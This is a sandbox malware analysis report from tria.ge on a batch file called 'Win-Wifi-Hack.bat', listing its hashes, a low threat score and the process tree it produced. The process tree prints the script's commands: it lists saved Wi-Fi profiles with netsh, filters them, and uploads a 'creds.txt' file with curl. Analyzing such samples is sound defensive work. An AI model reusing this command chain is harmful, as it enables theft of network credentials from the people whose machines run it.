Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
16s -
max time network
21s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
28/01/2024, 07:59
Static task
static1
Behavioral task
behavioral1
Sample
Win-Wifi-Hack.bat
Resource
win10v2004-20231215-en
1 signatures
150 seconds
General
-
Target
Win-Wifi-Hack.bat
-
Size
696B
-
MD5
869c35a019cab10d5ee5d3929c8ddf8f
-
SHA1
3a82aa458d47bd373a2ec4aaa585c0bf9b923edc
-
SHA256
732be9a3433a3e31785a2b0147a71b30fda3081a12b6279d16707377253e08ec
-
SHA512
681aef6ef6b921f9195855a00c015c7b91297fbe33f7c3475b6bbeb7ac951699993ad1f5863d55c1c407f5ec011d3ead28616e989bc29694d2bf62658c76e49c
Score
1/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 876 wrote to memory of 1940 876 cmd.exe 86 PID 876 wrote to memory of 1940 876 cmd.exe 86 PID 876 wrote to memory of 3620 876 cmd.exe 87 PID 876 wrote to memory of 3620 876 cmd.exe 87 PID 876 wrote to memory of 4296 876 cmd.exe 90 PID 876 wrote to memory of 4296 876 cmd.exe 90
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Win-Wifi-Hack.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\system32\netsh.exenetsh wlan show profiles2⤵PID:1940
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"2⤵PID:3620
-
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Temp\creds.txt"2⤵PID:4296
-